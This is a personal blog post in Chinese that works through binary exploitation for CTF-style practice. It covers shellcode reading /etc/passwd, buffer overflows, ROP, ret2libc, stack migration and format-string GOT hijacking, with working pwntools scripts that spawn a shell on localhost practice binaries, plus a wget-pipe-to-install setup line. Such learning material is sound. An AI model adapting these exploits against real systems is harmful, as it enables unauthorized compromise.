Blue Whale PWN Learning

蓝鲸PWN快速入门～真的很快速。。但是在没搞懂原理的情况下debug的时候就很难受……

0x01 Basic Conception

环境搭建

sudo apt-get install nasm gcc-4.8 gdb binutils hexedit gcc-4.8-multilib

# 32位libc库
sudo apt-get install libc6-dev-i386
# qira
https://github.com/geohot/qira
# github上面那个安装方法会有问题，我后来装的是1.2版本
cd ~/ && wget -qO- https://github.com/BinaryAnalysisPlatform/qira/archive/v1.2.tar.gz | tar zx && cd qira-1.2 && ./install.sh

# 报错：ImportError: No module named ext.socketio
# 重新安装低版本flask
pip install Flask==0.10.1

# 安装完成后的测试命令
qira -s ./binary
# gdb
https://github.com/longld/peda

工具介绍

GDB

gdb -q ./***

objdump

objdump -d -M intel ./***

shellcode

# nasm
nasm a.asm -o a.o -felf32

# objcopy 删除无关elf内容，提取所需可执行内容
objcopy -O binary a.o code
# 16进制查看
xxd -i code
# 输出成头文件
xxd -i code > code.h
# 编译shellcode
gcc vul.c -o vul -m32 -zexecstack
# 通过vul执行shellcode
(cat code;cat) | ./vul

vul.c

#include<unistd.h>

char code[200];
typedef int (*CODE)();

int main()
{
    read(0,code,100);
    ((CODE)code)();
}

-w535

函数调用

    jmp file
open:
    pop ebx
    xor eax,eax
    mov al,5
    xor ecx,ecx
    int 0x80

    mov ebx,eax
    mov al,3
    mov ecx,esp
    mov dl,0x30
    int 0x80

    mov al,4
    mov bl,1
    mov dl,0x30
    int 0x80

    xor eax,eax
    inc eax
    int 0x80

file:
    call open
    db '/etc/passwd', 0x0

执行流程：
jmp file -> call open & 将/etc/passwd入栈，0x0用于“截断”后面的字符 -> pop ebx将栈顶的/etc/passwdpop出来赋给ebx -> 将eax异或置0 -> 将5赋给al寄存器（执行open()函数） -> 将ecx异或置0 （只读）-> int 0x80 结束open()函数 -> 将eax赋给ebx（eax返回的是open()函数返回的文件描述符） -> 将3赋给al寄存器（执g)函数） -> 将esp（栈顶的东西）赋给ecx-> 将dl赋值30（read的长度） ->int 0x80结束read()函数 -> 将4赋给al寄存器 -> 将1赋给bl寄存器（write到屏幕）-> 将30赋给dl寄存器 ->int 0x80结束write()函数 -> 将eax异或置0 ->inc eax加一，执行exit()函数 ->innt 0x80结束exit()`函数

Comsumption

Register Architecture

-w877

假如EAX是12345678h
那么AX就是EAX的低16位，即5678h
AL就是AX的低16位，即78h

同理EBX，ECX，EDX…… 这样就能解释上面，函数调用那里，为啥将eax异或置0之后，给al赋0x**了。

Command

MOV dst,src
add dest,src
sub dest,src
mul arg
# 自加1
inc
# 自减1
dec
cmp
push
pop

System Call

eax: system call number / return value
ebx,ecx,edx,esi,edi:argument
instruction: int 0x80

Linux Syscall Reference

0x02 Buffer overflow

Vulnerable Functions

gets
scanf
strcpy
sprintf
memcpy
strcat
……

Return to Text

这个的漏洞点也很直接了当，没有对buf做限制

ssize_t vuln()
{
  char buf; // [sp+1Ch] [bp-1Ch]@1

  write(1, "[*]Welcome to pwn1\n", 0x13u);
  return read(0, &buf, 0x32u);
}

而且里面还有一个shell函数，所以直接就能上exp拿shell

exp

from pwn import *

r = remote('localhost', 4000)

r.sendline('a'*32 + p32(0x0804851D))

r.interactive()

Return to Shellcode

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+1Ch] [bp-14h]@1

  setvbuf(stdout, 0, 2, 0);
  printf("Name:");
  read(0, &name, 0x32u);
  printf("Try your best:");
  return (int)gets((char *)&v4);
}

这道同样是溢出，但是没有内置shell函数，刚好看到有个定义的全局变量$name(bss段)，他的地址不会改变，所以我们就可以往他那写shellcode，然后溢出的时候return到他的地址就可以。

这里pwntools的asm(shellcraft.sh()，asm()是生成汇编,shellcraft.xx()是pwntools封装好的内置shellcode

exp

from pwn import *

r = remote('localhost', 4000)

r.recvuntil('Name:')
r.sendline(asm(shellcraft.sh()))
r.recvuntil('Try your best:')
r.sendline('a'*32 + p32(0x0804a060))

r.interactive()

homework

这道题知道溢出点在gets()和strcpy()上，但是不知道怎么下手。。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax@1
  int result; // eax@1
  int v5; // ecx@1
  int v6; // [sp+18h] [bp-468h]@1
  int v7; // [sp+7Ch] [bp-404h]@1
  int v8; // [sp+47Ch] [bp-4h]@1

  v8 = *MK_FP(__GS__, 20);
  alarm(0x3Cu);
  setvbuf(stdout, 0, 2, 0);
  v3 = z();
  printf("Echo string (less than %d bytes): ", v3 / 0x2710);
  gets((char *)&v7);
  strcpy((char *)&v6, (const char *)&v7);
  puts((const char *)&v6);
  result = 0;
  v5 = *MK_FP(__GS__, 20) ^ v8;
  return result;
}

0x03 ROP

Return Oriented Programming(ROP)
是一种利用现有的程序片段组合出想要功能的技巧

可以使用ROP解除DEP限制，然后执行shellcode
可以使用ROP绕过ASLR限制
可以使用ROP绕过StackGuard
可以使用ROP绕过PIE

使用ROP的关键

查找gadget
排列gadget

ROP类型

控制寄存器做syscall
使用原有程序里的function
使用libc里的gadget或function(绕过ASLR)

查找ROP
ROPGadget

ROPgadget --binary ./rop
ROPgadget --binary ./rop --opcode cd80c3
cd80c3 // int 0x80 ; ret

ASLR

Address Space Layout Randomization 地址随机化
检查是否开启ASLR
cat /proc/sys/kernel/randomize_Va_space

DEP

Data Execution Prevention (NX)
可写的不可以执行，可执行的不可以写

homework1

这个跟视频里讲的rop例子是一样的，只是把pop ecx和pop ebx放到了一块赋值。所以基本上没有什么难点，自己敲一遍就理解了。
-w1611
payload

from pwn import *

r = remote('localhost', 4000)

pop_eax_ret = 0x080bae06
pop_ecx_ebx_ret = 0x0806e851
pop_edx_ret = 0x0806e82a
buf = 0x80eb000 - 100
int_0x80_ret = 0x0806eef0
rop = [
    pop_eax_ret,
    3,
    pop_ecx_ebx_ret,
    buf,
    0,
    pop_edx_ret,
    50,
    int_0x80_ret,
    pop_eax_ret,
    0xb,
    pop_ecx_ebx_ret,
    0,
    buf,
    pop_edx_ret,
    0,
    int_0x80_ret
]
r.recvuntil('Your input :')
r.sendline('a'*32 + flat(rop))
sleep(2)
r.sendline('/bin/sh\x00')
r.interactive()

有两个小疑问就是

出入栈的原理，为什么pop出来之后return相当于复制操作
真实环境中第一次手动sendline之后程序就退出了，为啥还能脚本里还能sendline第二次

Answer：

看汇编去！
因为第一次写入了read函数，从屏幕中获取输入写入buf中，后面才能exec

PIE

Position independent Execution
地址无关可执行文件

StackGuard

编译器对stack overflow的一种保护机制，在函数被调用时，先在stack上放canary，函数返回前先检查这个值有没有被修改，可以有效的防止缓冲区溢出攻击

Return to Library

Lazy Binding

PLT
GOT(Global Offset Table) 全局偏移表
.got 保存全局变量的地址
.got.plt保存函数引用地址

-w629

ret2lib

这个类型的考点关键在于得到基地址，知道了基地址就可以用readelf去获取所用函数的偏移地址，然后再找个可写的地址，构造rop，传进去即可。

ldd ./** 查看程序调用了哪个libc库
readelf -a /lib32/libc.so.6 | grep puts@ 查找libc库某函数的偏移地址
pwntools ELF Files
gdb run之后输入bt就可以看到libc库的地址 Linux中用gdb 查看代码堆栈的信息

查看找的偏移地址是否正确可以对照libc库中后1.5个byte的da0

readelf查找偏移
-w731
pwntools
-w724

payload

from pwn import *

# 加载libc库
libc = ELF('/lib32/libc.so.6')

r = remote('localhost', 4000)


puts_got_plt = 0x804a01c
puts_off = 0x005f140


r.recvuntil(':')
r.sendline(str(puts_got_plt))
r.recvuntil(':')
# 基地址 = （打印的）实际地址 - 偏移地址
libc_base = int(r.recvuntil('\n').strip(),16) - puts_off

print 'Libc Base Addr : ' + hex(libc_base)

# readelf 查找的函数偏移地址
# gets_off = 0x005e890 
# system_off = 0x003a940
# gets = libc_base + gets_off
# system = libc_base + system_off

# pwntools 查找的函数偏移地址
gets = libc_base + int(hex(libc.symbols['gets']),16)
system = libc_base + int(hex(libc.symbols['system']),16)
buf = 0x804b000 - 100
rop = [
    gets,
    system,
    buf,
    buf
]
r.sendline('a'*60 + flat(rop))
sleep(2)
r.sendline('/bin/sh\x00')


r.interactive()

payload2
自己通过write() / puts()寻找函数实际地址，计算基地址
-w724

from pwn import *

context.log_level='debug'
r = remote('localhost', 4000)
pwnme = ELF('./pwnme')
libc = ELF('/lib32/libc.so.6')

libc_start_main_got = pwnme.got['__libc_start_main']
libc_offset = libc.symbols['__libc_start_main']
write = pwnme.symbols['write']
main = 0x804847D
buf = 0x804b000 - 100
rop = [
    write,
    main,
    1,
    libc_start_main_got,
    50,
]
print r.readline(), r.readline()
r.sendline('a'*20 + flat(rop))
#r.recvline()
#tmp = r.recvline()
# print len(tmp)
#for i in range(len(tmp)):
#   print(hex(u32(tmp[i:i+4])))
libc_base = u32(r.recvline()[0:4]) - libc_offset
# libc_base = 0xf660a000
# libc_base = 0xf6622540 - libc_offset
print 'Libc base addr : ' + hex(libc_base)
gets = libc_base + libc.symbols['gets']
system = libc_base + libc.symbols['system']
rop2 = [
    gets,
    system,
    buf,
    buf
]
print r.readline(), r.readline()
r.sendline('a'*20 + flat(rop2))
sleep(2)
r.sendline('/bin/sh\x00')

r.interactive()

这道题是分两次执行的，第一次write出base地址，然后第二次在脚本里面写死base地址，再传进去。拿shell。一直想调一步执行，但是遇到各种蜜汁问题。。。基础不牢地动山摇，根本不会debug就很难受。。先放一放。。

Stack Migration

homework

这个调了半天有bug，基地址也是对的，但是就是拿不到shell，然后一步步debug，差点就自闭了，结果发现pop_ebp_ret的地址复制错了。。看来又是一个细心活，不能急，不然就是一步错，“步步错”！
-w730

from pwn import *

r = remote('localhost', 4000)

pwn1 = ELF('./pwn1')
libc = ELF('/lib32/libc.so.6')
# 获取函数实际地址
libc_start_main_got = pwn1.got['__libc_start_main']
# 获取libc库中函数偏移地址
libc_start_off = libc.symbols['__libc_start_main']

puts = pwn1.symbols['puts']
read = pwn1.symbols['read']
buf1 = 0x804b000 - 100
pop_ebp_ret = 0x0804865f
pop3_ret = 0x0804865d
leave_ret = 0x080484b8

rop1 = [
    puts,
    pop_ebp_ret,
    libc_start_main_got,
    read,
    pop3_ret,
    0,
    buf1,
    50,
    pop_ebp_ret,
    buf1 - 4,
    leave_ret
]

r.recvuntil(':')
r.sendline('a'*140 + flat(rop1))
r.recvline()
r.recvline()
# tmp = r.recvline()
# for i in range(len(tmp)):
#     print(hex(u32(tmp[i:i+4])))
libc_base = u32(r.recvline()[71:75]) - libc_start_off
# libc_base = 0xf6622540 - libc_start_off
print 'Libc base addr : ' + hex(libc_base)

gets = libc_base + libc.symbols['gets']
system = libc_base + libc.symbols['system']
buf2 = 0x804b000 - 500

rop2 = [
    gets,
    system,
    buf2,
    buf2
]
r.sendline(flat(rop2))
sleep(2)
r.sendline('/bin/sh\x00')
r.interactive()

Patch

改16进制
sed -i s/待替换的字符/替换的字符/g ./pwn1

hook

0x04 Format String Attack

Format string 可以被攻击者的输入任意控制，而printf本身不检查后面有几个参数。

使用 %x 会造成栈上的信息泄露
可以使用 $ 来控制leak的位置

Use fmt

%N%x 打印地址
%N%hhd 打印byte
%N$s 打印str

Read from arbitrary memory

from pwn import *

r = remote('localhost', 4000)

password = 0x804A048
r.recvuntil('?')
r.sendline(p32(password) + '#' + '%10$s'+ '#')
r.recvuntil('#')
# print u32(r.recvuntil('#')[:4])
pwd = u32(r.recvuntil('#')[:4])
#r.recvuntil(':')
sleep(2)
r.sendline(str(pwd))
r.interactive()

Write to arbitrary memory

掌握fmtstr_payload()的用法

from pwn import *

r = remote('localhost', 4000)

x_addr = 0x804a02c
r.sendline(fmtstr_payload(7, {x_addr:0x14368792}))

r.interactive()

GOT Hijacking

综合利用：
使用任意地址读取，获取当前函数的实际地址，从而获取libc基地址
利用libc基地址+偏移地址可以知道其他函数地址
利用任意地址写入，从而配合got hijacking更改已有函数地址

payload

from pwn import *

r = remote('localhost', 4000)
fmt = ELF('./fmt1')
libc = ELF('/lib32/libc.so.6')

libc_start_got = fmt.got['__libc_start_main']
libc_off = libc.symbols['__libc_start_main']

r.sendline(p32(libc_start_got) + '#' + '%5$s' + '#')
r.recvuntil('#')
libc_base = u32(r.recvuntil('#')[:4]) - libc_off
print 'Libc base addr : ' + hex(libc_base)

printf_got = fmt.got['printf']
system = libc_base + libc.symbols['system']

r.sendline(fmtstr_payload(5, {printf_got:system}))
r.interactive()

0x05 Summary

未涉及的：
64bit程序、Canary保护、无libc情况、Heap exploit

Course:
Modern Binary Exploitation

0aKarma

blog